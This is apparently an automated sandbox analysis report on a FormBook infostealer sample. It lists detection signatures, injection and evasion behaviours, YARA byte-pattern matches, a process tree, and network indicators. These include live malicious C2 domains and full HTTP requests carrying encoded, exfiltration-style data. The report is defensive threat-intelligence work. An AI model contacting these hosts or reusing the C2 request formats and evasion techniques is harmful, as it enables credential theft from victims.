Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
yZcecBUXN7.exe

Overview

General Information

Sample name:yZcecBUXN7.exe
renamed because original name is a hash value
Original sample name:9cd48f0d93c28ae6559409de23414554.exe
Analysis ID:1435169
MD5:9cd48f0d93c28ae6559409de23414554
SHA1:a6a625d2dce72bf9f7deee747c95ed7f7cf36cd0
SHA256:3ed0095ee2de05e81ac2c954eb0df312d6b919d871b60ce4265acd266be09d3c
Tags:32exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected FormBook
.NET source code references suspicious native API functions
Deletes itself after installation
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses netsh to modify the Windows network and firewall settings
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to detect virtual machines (SLDT)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • yZcecBUXN7.exe (PID: 6640 cmdline: "C:\Users\user\Desktop\yZcecBUXN7.exe" MD5: 9CD48F0D93C28AE6559409DE23414554)
    • yZcecBUXN7.exe (PID: 6712 cmdline: "C:\Users\user\Desktop\yZcecBUXN7.exe" MD5: 9CD48F0D93C28AE6559409DE23414554)
      • jBaxmaKIzqHZYEOPQcTTJTXx.exe (PID: 3688 cmdline: "C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • netsh.exe (PID: 6760 cmdline: "C:\Windows\SysWOW64\netsh.exe" MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
          • jBaxmaKIzqHZYEOPQcTTJTXx.exe (PID: 916 cmdline: "C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 3020 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.4125352041.00000000055B0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000007.00000002.4125352041.00000000055B0000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x90f43:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x7a482:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000001.00000002.1897755674.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000001.00000002.1897755674.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2da63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x16fa2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 13 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        1.2.yZcecBUXN7.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          1.2.yZcecBUXN7.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2da63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16fa2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          0.2.yZcecBUXN7.exe.3ae4f90.2.raw.unpackMALWARE_Win_DLInjector02Detects downloader injectorditekSHen
          • 0x6be6b:$x1: In$J$ct0r
          1.2.yZcecBUXN7.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            1.2.yZcecBUXN7.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2cc63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x161a2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
            Click to see the 5 entries

            Sigma Signatures

            No Sigma rule has matched

            Snort Signatures

            No Snort rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://www.dhleba51.ru/0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=bCD+TBjy8MosL0R8cjbFvxriDyPYhKFZsDVB2lzqkrb80jeseZ1xwY0K4Gv6crRSCTRNIEUsU3Jqelj2oHAe6QPTv8GQpjovQK3uiYXh6MxwvjeFy3ewRNM=Avira URL Cloud: Label: malware
            Source: http://www.bnbuotqakx.shop/0hhg/Avira URL Cloud: Label: malware
            Source: http://www.dhleba51.ru/0hhg/Avira URL Cloud: Label: malware
            Source: http://www.vavada-band.ru/0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=ZgUGIv2SFtjYSXZ+sPWjrnmi9x4JTSAxK/4wkC6FqAYJ2g+qpBbYR3pK2HW+0dFnzG0fITqUvE2Gc/Yp1eE4tJw0C8fQ5yYHj2xbYtSMWmtqetVE9PQCI40=Avira URL Cloud: Label: malware
            Source: http://www.bnbuotqakx.shopAvira URL Cloud: Label: malware
            Multi AV Scanner detection for domain / URL
            Source: bnbuotqakx.shopVirustotal: Detection: 5%Perma Link
            Source: www.vavada-band.ruVirustotal: Detection: 6%Perma Link
            Source: http://www.bettaroom.ru/0hhg/Virustotal: Detection: 7%Perma Link
            Multi AV Scanner detection for submitted file
            Source: yZcecBUXN7.exeReversingLabs: Detection: 28%
            Source: yZcecBUXN7.exeVirustotal: Detection: 37%Perma Link
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.yZcecBUXN7.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.yZcecBUXN7.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.4125352041.00000000055B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1897755674.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4123925036.0000000001320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4123058161.0000000000F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1898683610.0000000001020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4123873184.0000000002960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1899804288.0000000001640000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Machine Learning detection for sample
            Source: yZcecBUXN7.exeJoe Sandbox ML: detected
            Source: yZcecBUXN7.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: yZcecBUXN7.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: yZcecBUXN7.exe, 00000000.00000002.1628173538.0000000005330000.00000004.08000000.00040000.00000000.sdmp, yZcecBUXN7.exe, 00000000.00000002.1626818477.0000000002A71000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: netsh.pdb source: yZcecBUXN7.exe, 00000001.00000002.1898532114.0000000000E28000.00000004.00000020.00020000.00000000.sdmp, yZcecBUXN7.exe, 00000001.00000002.1898532114.0000000000E41000.00000004.00000020.00020000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000002.4123319938.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000002.4123319938.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000000.1770920776.000000000004E000.00000002.00000001.01000000.00000007.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000000.1972232269.000000000004E000.00000002.00000001.01000000.00000007.sdmp
            Source: Binary string: wntdll.pdbUGP source: yZcecBUXN7.exe, 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000004.00000003.1897494718.0000000001227000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000004.00000003.1902030596.000000000358C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: netsh.pdbGCTL source: yZcecBUXN7.exe, 00000001.00000002.1898532114.0000000000E28000.00000004.00000020.00020000.00000000.sdmp, yZcecBUXN7.exe, 00000001.00000002.1898532114.0000000000E41000.00000004.00000020.00020000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000002.4123319938.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000002.4123319938.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: yZcecBUXN7.exe, yZcecBUXN7.exe, 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, netsh.exe, 00000004.00000003.1897494718.0000000001227000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000004.00000003.1902030596.000000000358C000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C1B710 FindFirstFileW,FindNextFileW,FindClose,4_2_00C1B710
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4x nop then xor eax, eax4_2_00C09350
            Source: Joe Sandbox ViewIP Address: 203.161.50.127 203.161.50.127
            Source: Joe Sandbox ViewIP Address: 195.24.68.5 195.24.68.5
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=ZgUGIv2SFtjYSXZ+sPWjrnmi9x4JTSAxK/4wkC6FqAYJ2g+qpBbYR3pK2HW+0dFnzG0fITqUvE2Gc/Yp1eE4tJw0C8fQ5yYHj2xbYtSMWmtqetVE9PQCI40= HTTP/1.1Host: www.vavada-band.ruAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /0hhg/?ABqDW6A8=20u2NLSYHglGGzLXpCvTxXPv5nfEDKk1YS+A026fVEbSVoETlWaKPzhT739k4HudG+XQgMpMmykoK0OCVVIx1ieYSqFXq5syzWGOoCFdAiVWKrRgEgzBh9g=&nNWXI=ybhXiHipjHJ HTTP/1.1Host: www.bettaroom.ruAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=bCD+TBjy8MosL0R8cjbFvxriDyPYhKFZsDVB2lzqkrb80jeseZ1xwY0K4Gv6crRSCTRNIEUsU3Jqelj2oHAe6QPTv8GQpjovQK3uiYXh6MxwvjeFy3ewRNM= HTTP/1.1Host: www.dhleba51.ruAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /0hhg/?ABqDW6A8=3wBFJopWm5CMrZiTyKtS+1p+7hjS88lkxUD6z9EbhjEDI4ONso69BWfj9WDOW8yAnPP5dxxY4Y59DXJqqTyKGc0G8sgHpv85TbqwFJKqhW0zFRgOzIl1BwU=&nNWXI=ybhXiHipjHJ HTTP/1.1Host: www.dainikmirpur.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /0hhg/?ABqDW6A8=3wBFJopWm5CMrZiTyKtS+1p+7hjS88lkxUD6z9EbhjEDI4ONso69BWfj9WDOW8yAnPP5dxxY4Y59DXJqqTyKGc0G8sgHpv85TbqwFJKqhW0zFRgOzIl1BwU=&nNWXI=ybhXiHipjHJ HTTP/1.1Host: www.dainikmirpur.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=OATZzJPiUUGU3mpjZciWUPZeXbT2MJCMteYhXkaeth47OgAuOtH7Ax1R5cSUzc8K7tJsdCLV7T20xyzul8wSbYrVofQNfqyssPuErqT1NUPeqaem3KrcSI4= HTTP/1.1Host: www.whirledairlines.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /0hhg/?ABqDW6A8=nDs+4sFgmC14rZAzdMtU+fOluyCTVoLAn9AW6ezlSd5l//pRDkDNUYKtMPmQp3hOJuHIoac+nQZfVGszaQStOPCeLqTfiXL51+ke6KS/qQDP30/ytVZd2Oc=&nNWXI=ybhXiHipjHJ HTTP/1.1Host: www.quantummquest.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=XN/uN6nMvrGkpcBz+Thv1jYaxJtcZ3guzCEwk+wO1IePrLEfQ2dONhxJJ5MfI8SrhyY28ykjUI4nvFFhDsPQuo7fansGo7O9hSpOWy12njMGsYSDFVmwrLg= HTTP/1.1Host: www.yamiyasheec.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /0hhg/?ABqDW6A8=vkFwZ006WdHbpHCmjjBOYDeoX+Rn6aHsZLnu3NGBe2VBUm0fUZsnu3sABaHfjqCa4r+GKRPsyPs5e5gNT6h7MvS/nYKUeSlb7fRS9PCej43uXu++wSLzang=&nNWXI=ybhXiHipjHJ HTTP/1.1Host: www.applesolve.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=4PSEdCTPIXdKXl7uh+LsBTwAtAbEEDmKYAJsxyVVq9bdmcYGjB9JHSE/ykX4VkYbcxwnxSFcyayelsVtdhVYibhKvsL7bWoBJw77jiRnpeIfkNF5+PYwYCo= HTTP/1.1Host: www.xxaiai.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=Np3vqe/1Cu/OQ51upJR8Qsht1t6ybRV+pU7NEwPzo+CdnJXCrwJJ0q4TeA3yrjOGKQp+qts/DZNdYR5Nz+PtVR15bhmDHV5jmEZsuo4OBXvm+mP+YyhGbOc= HTTP/1.1Host: www.dk48.lolAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=nRUqMZh05AeT5XBXy6tvbUigcs6hc4rC+kK/un5r26ew8GYnMJKxFmClF8lXwwqE5TFZd2gxpf2h1MF48x8mm8dpDB1BgTHqwJGV3u14y6bwQsvyQrq4dK8= HTTP/1.1Host: www.cucuzeus88.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: netsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: <li><a rel="nofollow" href="https://twitter.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.3 0.3) translate(-200 -300)"><path d="m 453.82593,412.80619 c -6.3097,2.79897 -13.09189,4.68982 -20.20852,5.54049 7.26413,-4.35454 12.84406,-11.24992 15.47067,-19.46675 -6.79934,4.03295 -14.3293,6.96055 -22.34461,8.53841 -6.41775,-6.83879 -15.56243,-11.111 -25.68298,-11.111 -19.43159,0 -35.18696,15.75365 -35.18696,35.18525 0,2.75781 0.31128,5.44359 0.91155,8.01875 -29.24344,-1.46723 -55.16995,-15.47582 -72.52461,-36.76396 -3.02879,5.19662 -4.76443,11.24048 -4.76443,17.6891 0,12.20777 6.21194,22.97747 15.65332,29.28716 -5.76773,-0.18265 -11.19331,-1.76565 -15.93716,-4.40083 -0.004,0.14663 -0.004,0.29412 -0.004,0.44248 0,17.04767 12.12889,31.26806 28.22555,34.50266 -2.95247,0.80436 -6.06101,1.23398 -9.26989,1.23398 -2.2673,0 -4.47114,-0.22124 -6.62011,-0.63114 4.47801,13.97857 17.47214,24.15143 32.86992,24.43441 -12.04227,9.43796 -27.21366,15.06335 -43.69965,15.06335 -2.84014,0 -5.64082,-0.16722 -8.39349,-0.49223 15.57186,9.98421 34.06703,15.8094 53.93768,15.8094 64.72024,0 100.11301,-53.61524 100.11301,-100.11387 0,-1.52554 -0.0343,-3.04251 -0.10204,-4.55261 6.87394,-4.95995 12.83891,-11.15646 17.55618,-18.21305 z" /></g></svg></a></li> equals www.twitter.com (Twitter)
            Source: netsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: <li><a rel="nofollow" href="https://www.facebook.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.25 0.25) translate(30 50)"><path d="M182.409,262.307v-99.803h33.499l5.016-38.895h-38.515V98.777c0-11.261,3.127-18.935,19.275-18.935 l20.596-0.009V45.045c-3.562-0.474-15.788-1.533-30.012-1.533c-29.695,0-50.025,18.126-50.025,51.413v28.684h-33.585v38.895h33.585 v99.803H182.409z" /></g></svg></a></li> equals www.facebook.com (Facebook)
            Source: global trafficDNS traffic detected: DNS query: www.vavada-band.ru
            Source: global trafficDNS traffic detected: DNS query: www.bettaroom.ru
            Source: global trafficDNS traffic detected: DNS query: www.dhleba51.ru
            Source: global trafficDNS traffic detected: DNS query: www.dainikmirpur.com
            Source: global trafficDNS traffic detected: DNS query: www.whirledairlines.com
            Source: global trafficDNS traffic detected: DNS query: www.quantummquest.top
            Source: global trafficDNS traffic detected: DNS query: www.yamiyasheec.online
            Source: global trafficDNS traffic detected: DNS query: www.applesolve.com
            Source: global trafficDNS traffic detected: DNS query: www.xxaiai.top
            Source: global trafficDNS traffic detected: DNS query: www.vaesen.net
            Source: global trafficDNS traffic detected: DNS query: www.dk48.lol
            Source: global trafficDNS traffic detected: DNS query: www.cluird.cloud
            Source: global trafficDNS traffic detected: DNS query: www.cucuzeus88.store
            Source: global trafficDNS traffic detected: DNS query: www.bnbuotqakx.shop
            Source: unknownHTTP traffic detected: POST /0hhg/ HTTP/1.1Host: www.bettaroom.ruAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Origin: http://www.bettaroom.ruContent-Type: application/x-www-form-urlencodedConnection: closeCache-Control: max-age=0Content-Length: 205Referer: http://www.bettaroom.ru/0hhg/User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36Data Raw: 41 42 71 44 57 36 41 38 3d 37 32 47 57 4f 2b 62 4f 47 46 35 32 47 46 58 2f 6b 6a 36 36 75 33 50 6f 77 6d 72 36 50 37 55 49 4d 52 4b 76 2b 32 57 65 66 31 76 38 55 4b 45 75 67 48 57 66 4b 7a 64 6b 30 53 31 6f 37 32 69 75 4e 74 37 72 74 4e 35 46 6a 53 4d 78 59 6d 66 51 64 30 4a 56 7a 54 36 53 4b 70 39 36 70 35 4e 31 6e 47 75 47 73 6d 4d 6a 4a 78 74 54 59 73 6c 71 46 6d 7a 6d 37 74 57 2f 38 37 57 45 66 63 6c 51 76 37 57 77 34 66 46 6b 78 48 70 7a 4a 4c 50 32 51 68 75 79 4c 76 54 71 47 6e 48 57 66 47 6a 32 47 47 48 44 36 68 46 51 49 4b 71 54 71 33 2f 74 58 56 4f 5a 6a 61 57 48 79 69 58 73 4a 44 62 4f 6c 51 3d 3d Data Ascii: ABqDW6A8=72GWO+bOGF52GFX/kj66u3Powmr6P7UIMRKv+2Wef1v8UKEugHWfKzdk0S1o72iuNt7rtN5FjSMxYmfQd0JVzT6SKp96p5N1nGuGsmMjJxtTYslqFmzm7tW/87WEfclQv7Ww4fFkxHpzJLP2QhuyLvTqGnHWfGj2GGHD6hFQIKqTq3/tXVOZjaWHyiXsJDbOlQ==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 02 May 2024 06:24:43 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: closeVary: Accept-EncodingData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
